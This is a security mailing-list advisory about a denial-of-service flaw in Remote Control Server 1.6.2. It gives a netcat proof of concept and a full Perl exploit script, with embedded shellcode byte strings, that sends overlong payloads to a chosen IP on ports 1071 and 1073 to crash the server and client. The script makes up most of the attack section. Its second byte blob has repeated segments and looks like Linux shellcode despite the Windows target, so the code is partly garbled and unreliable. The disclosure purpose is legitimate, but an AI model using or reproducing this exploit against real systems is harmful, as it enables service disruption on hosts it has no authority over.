[NT] Remote Control Server DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Remote Control Server DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.btcf.demon.co.uk/> Remote Control is "an application for
controlling large numbers of computers on a TCP/IP network while sitting
at the comfort of your own workstation. I have seen the same situation so
many times, especially with badly configured networks, or Windows 95
networks in general, there just doesn't seem to be a way to do certain
things without having to walk all the way over to the computer and do it
locally".

A denial of service condition occurs in the Remtoe Control Server whenever
a very long text string is sent to the service data application.

DETAILS

Vulnerable Systems:
* Remote Control Server version 1.6.2

A simple URL driven denial of service condition occurs when a very long
text string is sent to the server remote service.

Proof of Concept:
E:\>nc -v localhost 1071
Infam0us-Gr0up [127.0.0.1] 1071 (?) open
[string]

You will receive error message:
Run-time error '75':
Path/File access error
Or
Run-time error '380':
Invalid property value

The following two denial of service attacks result in the process hanging
and the CPU usage of 100%. A reboot is required in order to terminate the
hanging processes, when sending a string containing approximately 3094
characters:

Error 10061: Connection is forcefully rejected
No remote client to connect to.
Probable cause: Remote machine switched off or crashed.

Exploit:
#!/usr/local/bin/perl
#
# Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n";
print " Remote Control Server DOS Exploit\n";
print "------------------------------------\n\n";
print "Usage: $0 [remote IP]\n";
print "Exam: $0 127.0.0.1\n";
exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071";
print "\n";
print "[+] Connect to $remote..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build server sploit..\n";
sleep(3);
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec";
$sploit .= "\x8b\xc2\x83\xc0\x18\x33\xc9\x66\xb9\xb3\x80";
$sploit .= "\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa";
$sploit .= "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9";
$sploit .= "\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit .= "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa";
$sploit .= "\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit .= "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4";
$sploit .= "\xb7\xf0\xe0\xfd\x99";

print "[+] Attacking server..\n";
sleep(2);
$msg = "reboot" . $sploit . "\x90" x (3096 - length($sploit)) .
"\xe8\xf1\xc5\x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Server D0s'ed\n";
sleep(1);
close(SOCK);

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073";

print "[+] Connect to Client server..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build client Spl0it..\n";
sleep(3);

$dos =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";

print "[+] Attacking client..\n";
sleep(2);

print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";

print "DONE\n";
print "[+] Client D0s'ed\n";
sleep(1);
close(SOCK1);
exit;

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org>
basher13.
The original article can be found at: <http://infamous.2hell.com/>
http://infamous.2hell.com/

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.